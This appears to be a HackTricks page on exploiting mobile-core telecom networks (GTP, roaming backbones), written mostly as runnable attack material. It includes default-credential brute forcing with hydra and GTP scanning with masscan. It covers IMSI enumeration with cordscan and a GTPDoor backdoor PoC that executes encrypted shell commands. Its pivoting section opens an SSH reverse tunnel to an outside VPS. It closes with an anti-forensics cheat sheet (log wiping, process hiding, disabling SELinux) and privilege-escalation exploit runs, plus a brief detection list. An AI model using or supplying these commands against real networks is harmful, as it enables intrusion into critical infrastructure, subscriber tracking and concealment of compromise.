Telecom Network Exploitation (GTP / Roaming Environments)

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

note

Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach core signalling planes directly. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist dramatically increases brute-force success:

bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).

1.2 Host Discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with the built-in gtpv1 UDP probes to quickly map GTP-C listeners:

bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Enumerating Subscribers – cordscan

The following Go tool crafts GTP-C Create PDP Context Request packets and logs the responses. Each reply reveals the current SGSN / MME serving the queried IMSI and, sometimes, the subscriber’s visited PLMN.

bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Key flags:

  • --imsi Target subscriber IMSI
  • --oper Home / HNI (MCC+MNC)
  • -w Write raw packets to pcap

Important constants inside the binary can be patched to widen scans:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Code Execution over GTP – GTPDoor

GTPDoor is a tiny ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. The stdout/stderr are exfiltrated inside Echo Response messages so that no outward session is ever created.

Minimal PoC packet (Python):

python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

  • any host sending unbalanced Echo Requests to SGSN IPs
  • GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec

4. Pivoting Through the Core

4.1 sgsnemu + SOCKS5

OsmoGGSN ships an SGSN emulator able to establish a PDP context towards a real GGSN/PGW. Once negotiated, Linux receives a new tun0 interface reachable from the roaming peer.

bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
       -APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home:

bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Check that GatewayPorts yes is enabled on the VPS.

5. Covert Channels

ChannelTransportDecodingNotes
ICMP – EchoBackdoorICMP Echo Req/Rep4-byte key + 14-byte chunks (XOR)pure passive listener, no outbound traffic
DNS – NoDepDNSUDP 53XOR (key = funnyAndHappy) encoded in A-record octetswatches for *.nodep sub-domain
GTP – GTPDoorUDP 2123AES-128-CBC blob in private IEblends with legitimate GTP-C chatter

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.

6. Defense Evasion Cheatsheet

bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation on Legacy NE

bash
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Clean-up tip:

bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tool Box

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in previous sections.
  • FScan : intranet TCP sweeps (fscan -p 22,80,443 10.0.0.0/24)
  • Responder : LLMNR/NBT-NS rogue WPAD
  • Microsocks + ProxyChains : lightweight SOCKS5 pivoting
  • FRP (≥0.37) : NAT traversal / asset bridging

Detection Ideas

  1. Any device other than an SGSN/GGSN establishing Create PDP Context Requests.
  2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
  3. Frequent Echo Requests without corresponding Echo Responses – might indicate GTPDoor beacons.
  4. High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks